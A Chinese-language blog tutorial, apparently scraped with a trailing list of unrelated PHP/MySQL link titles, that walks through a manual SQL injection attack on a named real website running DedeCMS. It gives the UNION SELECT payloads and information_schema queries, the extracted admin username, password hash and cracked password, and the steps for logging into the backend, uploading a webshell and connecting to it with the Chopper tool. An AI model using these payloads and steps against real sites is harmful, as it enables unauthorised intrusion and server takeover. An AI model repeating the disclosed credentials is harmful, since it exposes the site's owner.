博客已转移到:PHP开发

注:此文章献给那些还对注入不怎么理解的人学习!

找到注入点后猜字段,可用order by 1猜解,order by不可用时,可用union联合查询!

我这里猜解到的字段是22, 上图:

接下来爆显示位!语法: and 1=2 union select1,2,4,5,...,22 字段多少就输入多少,中间太常,省略了!

然后回车打开,页面出现了一个9的数字!如图:

然后我们来查询下是什么版本,用户名,数据库!

version() 版本database()当前数据库 user() 用户,要查询什么就把刚才爆出9的显示位替换掉,如图:

这是版本号,如果要查询用户名就把浏览器上面的9替换成 user()就行了!

这是我查出来

版本号:5.1.32-community

数据库:51teamcom

用户名:51teamcom 数据库和用户名一样!

接下来我们来报表了, 语法 :FROM information_schema.TABLESwhere table_schema=database() limit 0,1 把浏览器里

的9改成 table_name ,然后回车,你就会看到表了,第一个表是:dede_addonarticle 我们只要爆出的管理员的表就行了!

我们继续爆,每爆一个就得修改下这个语法 limit 0,1 爆第2个的时候把0改成1,比如:limit 1,1 爆第3个的时候继续+1 如:limit 2,1 php中0是第一位!

这是我爆出来的表:

dede_addonproduct,dede_admin,dede_admintype,dede_arcatt,dede_arccache,dede_archives,dede_arcrank,dede_arctiny,ddede_arctype,dede_channeltype,dede_co_htmls,dede_co_mediaurls,dede_co_note,dede_co_urls,dede_diyforms,dede_feedback,dede_flink,dede_flinktype,dede_freelist,dede_guestbook,dede_homepageset

织梦的程序!

其中dede_admin 应该就是管理员的表了!我们爆下看!

爆之前,我们先把dede_admin 转换成16进制的,就是这个 646564655F61646D696E

语法:information_schema.columns WHEREtable_name=0x646564655F61646D696E limit0,1 还是跟上面一样,爆第几个就修改数字 0 ,把我们刚才转换的16进制放到0x后面,0x不要动,然后把显示位9的数字改成 column_name 然后就行!

我爆的段:id,userid,pwd,uname,tname,email pwd应该就是密码,uname应该是账号,我们试试!

and 1=2 union select 1,2,3,4,5,6...,22 from dede_admin 把浏览器里面的语法全部去掉,剩***入点就行,就是这样;

http://www.51team.cn/about.php?id=10 and 1=2 unionselect 1,2,3,4,5,6...,22 from dede_admin 然后回车!

然后把9替换成刚才我爆出来的字段 我替换了uname和pwd,开了2个浏览器!

用户是:admin密码是:d9d2b2de067864194059 密码加密的,可到cmd5.com解密 如图:

密码解出来了,这个 bx2013 ,接下来找后台,可以用软件扫或者谷歌找!我找出来了:

成功登陆:

随便找个上传点就行,然后上传马,先挂个txt吧,嘿嘿!http://www.51team.cn/a.txt

接下来,***咯!

***可以上传***马,也可以用菜刀,我就用菜刀的吧,方便!随便找个php文件添加一句话!

好,连接了

如果你是用网马脱的话,就得看网站配置文件conn.php 里面的数据库用户名和密码!

连接后,点网站列表,然后在网址那里右键点击数据库管理,然后打开一个窗口,那个窗口就是数据库了!如图:

mysql手注_php+mysql手注拿shell教程【朋友给的】相关推荐

  1. php mysql 日期时间_php Mysql日期和时间函数集合

    收集的比较全的Mysql日期和mysql时间函数 DATE_FORMAT(date,format) 根据format字符串格式化date值.下列修饰符可以被用在format字符串中: %M 月名字(J ...

  2. pdo mysql 绑定查询_php mysql PDO 查询操作的实例详解

    php mysql PDO 查询操作的实例详解 php mysql PDO 查询操作的实例详解 这篇文章主要介绍了php mysql PDO 查询操作的实例详解的相关资料,希望通过本文能帮助到大家,需 ...

  3. php mysql 读取数据_PHP MySQL 读取数据

    全屏 PHP MySQL 读取数据 从 MySQL 数据库读取数据 SELECT 语句用于从数据表中读取数据:SELECT column_name(s) FROM table_name 我们可以使用 ...

  4. php mysql 胚子_php mysql数据库连接浅识

    1.连接数据库连接函数: a.mysql_connect()  :函数打开非持久的 MySQL 连接 b.mysql_pconnect() :函数打开持久的MySQL 连接 mysql_connect ...

  5. php mysql用户登录_php mysql实现用户登录功能的代码示例

    接着上次的php mysql添加用户的功能代码,今天来学习下php实现用户登录与注销的功能,通过跟踪session会话来保存用户的登陆状态. 1,登录页面 login.php 用户登录_www.# 用 ...

  6. php mysql 超时时间_php mysql超时设置方法

    php mysql超时设置方法,源码,参数,底层,层面,都是 php mysql超时设置方法 易采站长站,站长之家为您整理了php mysql超时设置方法的相关内容. php mysql超时设置方法: ...

  7. php5.5 mysql密码无法_php – Mysql无法连接 – 访问被拒绝(使用密码是)

    我有11个2提供的托管,我刚刚创建了一个新的 MySQL用户,并允许它访问列出的每个操作. 我收到以下错误 Warning: mysql_connect() [function.mysql-conne ...

  8. php mysql 时间字段_php – MySQL中各种日期/时间字段类型的优...

    > TIMESTAMP存储在MySQL专有方法中(尽管它基本上只是一个由年,月,日,小时,分钟和秒组成的字符串),此外,只要插入或更改记录,TIMESTAMP类型的字段就会自动更新.显式字段值给 ...

  9. php mysql简单链接_php mysql 数据库链接简单例子

    这里是面向过程的mysql链接,两个文件,config.php和conn.php,只是记录一下,不喜勿喷,也希望有好的建议,代码如下: config.php /* * 与数据库链接有关的配置变量保存在 ...

最新文章

  1. [MySQL高级](一) EXPLAIN用法和结果分析
  2. 华为开发者大会鸿蒙2.0系统,鸿蒙2.0来了!华为开发者大会HDC 2020宣布
  3. 【Java】Java多线程神器:join使用及原理
  4. java中两个xml文件内容拼接_比较Java中2个XML文档的最佳方法
  5. 一个软件系统哪些可独立实现
  6. 分布式系统建模与关键技术
  7. vector获取缓冲区指针
  8. 如何让网站自动识别手机端与PC端
  9. 数学猜想验证步骤_高考数学19种答题方法,数学130+必备技能,附解题技巧word版!...
  10. 李力,王飞跃丨地面交通控制的百年回顾和未来展望
  11. word 批量把参考文献的交叉引用变成上标形式
  12. MATLAB——LTI Viewer
  13. Contest 1479 2018-ZZNU-ACM集训队 夏季队内积分赛 (3)K题(易水寒)
  14. 云虚拟机和普通虚拟机有什么区别
  15. [CodeForces - 447D] D - DZY Loves Modification
  16. 4.10 使用照片滤镜命令修改图像色温和色调 [原创Ps教程]
  17. pip安装报错ValueError: check_hostname requires server_hostname
  18. 浙江工大学计算机学院保研,浙江工业大学计算机科学与技术学院(专业学位)软件工程保研...
  19. MATLAB图像处理--高斯低通滤波、高斯高通滤波(代码及示例)
  20. android蟒蛇音效,ViPER4Android(蟒蛇音效)

热门文章

  1. php版 v2.0,KangPHP v2.0 正式版
  2. openstack rocky 安装_北京暖气安装费用-上海装修报价
  3. centos7 go yum 安装_超详细的centos7下载安装Postgresql11(yum安装)教程
  4. python3.5安装pygame_安装pygame for Python3.5
  5. Ubuntu20.04 安装VMware Tools
  6. 重装php后网站无法,1、解决重装php后变量在下一个页面无法取到的问题:
  7. mysql分库负载均衡_订单模块以及负载均衡和分库分表
  8. mysql aa复制_MySQL主从复制实现
  9. 电厂运维的cis数据_变配电智能化运维作用和优点,智慧供配电物联网
  10. Glide控制显示4个角